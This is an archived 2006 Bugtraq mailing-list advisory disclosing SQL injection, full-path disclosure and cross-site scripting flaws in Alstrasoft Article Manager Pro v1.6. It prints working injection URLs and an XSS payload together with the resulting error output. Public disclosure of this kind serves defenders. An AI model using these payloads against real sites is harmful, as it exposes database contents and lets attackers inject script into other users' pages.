lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060522232022.11315.qmail@securityfocus.com>
Date: 22 May 2006 23:20:22 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Alstrasoft Article Manager Pro v1.6


Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors

Homepage:
http://www.alstrasoft.com

Description:
Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more. 

Effected files:

profile.php
userarticles.php
submit_article.php 
mraticles.php
admin.php

Exploits & Vulns:


SQL Injection query error
http://www.example.com/article/profile.php?author_id=1'

1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for 

the right syntax to use near '\'' at line 1


SQL Injection:
http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--

Proof Of Concept: 
All articles in DB appear on page when the above query is preformed.


Full path errors

http://www.example.com/article/userarticles.php?aut_id=3'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/functions.php on line 212
Invalid user id supplied!


http://www.example.com/article/mrarticles.php?action=read'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/mrarticles.php on line 50


http://www.example.com/article/admin/admin.php?login
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html

/article/admin/auth.php on line 18


submit_article.php XSS Vuln.

When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter 

something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ